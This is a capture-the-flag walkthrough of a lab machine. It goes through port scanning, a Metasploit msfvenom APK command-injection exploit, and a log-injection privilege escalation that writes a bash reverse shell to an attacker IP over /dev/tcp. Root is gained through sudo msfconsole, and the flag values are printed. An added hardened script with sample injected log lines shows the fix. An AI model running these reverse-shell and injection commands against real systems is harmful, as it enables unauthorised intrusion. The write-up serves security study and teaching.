SCRIPT KIDDIE
Enumeration;
Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The usual port 80 is not open, so port 5000 is our entry point. Let's check it :)
Here is what we see at 10.10.10.226:5000
Exploitation
After some Google searching, this turns out to be vulnerable to the
Rapid7 Metasploit Framework msfvenom APK Template Command Injection. Check it out.
It's a pretty easy exploit. Before using this module, update your Metasploit:
msfupdate ----> use this command
STEPS:
1: sudo msfconsole
2: use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
3: set lhost 10.10.14.xx
4: set lport 9001
5: set rhost 10.10.10.226
6: set rport 5000
7: exploit
mv /root/.msf4/local/msf.apk . ----> move the apk file to the current directory
Upload msf.apk at 10.10.10.226:5000
Make sure to change the OS to Android
USER FLAG
BOOOM!! We get a reverse shell, lol, it's a piece of cake
kid@scriptkiddie:~$ cd /
cd /
kid@scriptkiddie:/$ cd home
cd home
kid@scriptkiddie:/home$ ls
ls
kid pwn
kid@scriptkiddie:/home$ cd kid
cd kid
kid@scriptkiddie:~$ cat user.txt
cat user.txt
0e4b318e4bd0405bc1ecbd22db500867
kid@scriptkiddie:~$
HORIZONTAL PRIVILEGE ESCALATION
kid@scriptkiddie:/home/pwn$ ls
ls
recon scanlosers.sh
kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
cat scanlosers.sh
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
Move to the 'pwn' user's directory and cat scanlosers.sh; it is an interesting bash script.
Let's move to the log in the kid directory.
Copy this simple command :)
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.XX/1234 0>&1' #" >> hackers
Be sure to change the IP and start a listener on your local machine.
Sometimes this does not work, so try 4 or 5 times.
Yep!! We got Pwn User
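The weakness in scanlosers.sh is that it takes whatever sits in field 3 onward of each log line and interpolates it into a string that is handed to sh -c, so any user who can write to /home/kid/logs/hackers gets code execution as pwn. The following hardened rewrite is an added example (it is not the box's own script, and the log file contents are constructed): it accepts only well-formed IPv4 addresses, passes each one to the scanner as its own argument rather than through sh -c, and keeps the scanner command in a SCANNER variable so it can be dry-run with SCANNER=echo.

```shell
#!/bin/bash
# Hardened variant of scanlosers.sh (added example, not the file from the box).
# Assumed log format, as the original's `cut -d' ' -f3` implies: two leading
# fields (e.g. date and time) followed by the client address.

# Validate a dotted-quad IPv4 address: four octets, digits only, each 0-255.
is_ipv4() {
    case "$1" in
        *[!0-9.]*|"") return 1 ;;   # any non-digit/non-dot character, or empty
    esac
    local IFS=.
    set -- $1                       # split on dots into positional parameters
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ -n "$octet" ] && [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Print the unique, valid addresses found in field 3 of the log at $1.
# Anything that is not an address (including injected shell text) is dropped.
extract_ips() {
    cut -d' ' -f3 "$1" | sort -u | while read -r ip; do
        if is_ipv4 "$ip"; then
            printf '%s\n' "$ip"
        fi
    done
}

# Scan each validated address, then truncate the log as the original does.
# The address is a separate argv element, never part of a shell string.
scan_log() {
    log=$1
    recon_dir=${RECON_DIR:-recon}
    mkdir -p "$recon_dir"
    extract_ips "$log" | while read -r ip; do
        "${SCANNER:-nmap}" --top-ports 10 -oN "$recon_dir/$ip.nmap" "$ip" >/dev/null 2>&1
    done
    : > "$log"
}

# Constructed sample log for demonstration: one valid repeated address,
# one out-of-range octet, and two lines carrying injected shell text.
write_sample_log() {
    cat > "$1" <<'EOF'
2021-02-06 10:00:01 10.10.14.5
2021-02-06 10:00:02 10.10.14.5
2021-02-06 10:00:03 192.168.1.300
2021-02-06 10:00:04 10.10.14.6;touch /tmp/pwned
2021-02-06 10:00:05 $(id)
EOF
}

# Usage (dry run, no real scan):
#   tmp=$(mktemp); write_sample_log "$tmp"; extract_ips "$tmp"
#   SCANNER=echo scan_log "$tmp"
```

Only 10.10.14.5 survives extract_ips on the sample log; the injected lines and the malformed address are discarded before anything reaches the scanner. The other half of the fix is file ownership: the log should not be writable by the kid user if a cron job running as pwn consumes it.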
ROOT FLAG
Copy these commands :)
1: sudo -l
2: sudo msfconsole /bin/bash -p
3: id
4: cat root.txt
5: f5482d18d0acd025b5e86f11d568fd83